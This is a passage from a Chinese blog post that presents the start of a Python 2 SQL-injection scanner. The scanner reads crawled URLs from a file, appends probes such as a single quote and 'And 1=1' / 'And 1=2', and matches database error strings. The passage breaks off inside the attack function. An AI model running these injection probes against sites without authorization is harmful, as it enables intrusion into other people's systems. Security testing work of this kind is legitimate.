上篇博客写到了对原始URL爬行页面提取有效URL
这篇继续深入,当提取到URL后开始检测是否存在注入漏洞
SQL注入检测思路:
爬行网址,提取带有参数的url 如 http://www.target.com/show.asp?id=666 这样的url地址
然后通过5重验证 :
1.在后面加上一个单引号
2.加上 And 1=1
3.加上 And 1=2
4.加上 And '1'='1
5.加上 And '1'='1 当然注入检测参数还是需要url编码然后在发送
通过对比每层返回的状态码 + 返回内容content + 双层内容对比 实现判断注入点
#coding = utf-8
#__author = lzyq
import re
import requests
import time
from bs4 import BeautifulSoup as asp
import random
import os
print unicode('''
作者:浪子燕青
作者QQ:982722261
''','gbk')
time.sleep(8)
headeraa = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)',}
zhaohan = open('mINJlogo.txt','a+')
zhaohan8 = open('INJ.txt','a+')
#一些数据库报错语句,用来判断是否是数据库报错
huixian1 = "is not a valid MySQL result resource"
huixian2 = "ODBC SQL Server Driver"
huixian3 = "Warning:ociexecute"
huixian4 = "Warning: pq_query[function.pg-query]"
huixian5 = "You have an error in your SQL syntax"
huixian6 = "Database Engine"
huixian7 = "Undefined variable"
huixian8 = "on line"
hansb = open('urllist.txt','r')
hanssb = hansb.readlines()
hansb.close()
ttzh = str(time.ctime())
#如果没有相关采集到的url地址先参考上篇博客,获取相关url
zhaohan.write('-------------------------------------------------LOGO-------------------------------------------------' + '\n')
headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.92 Safari/537.1 LBBROWSER'}
def attack(urlx):
payload0 = urlx + "'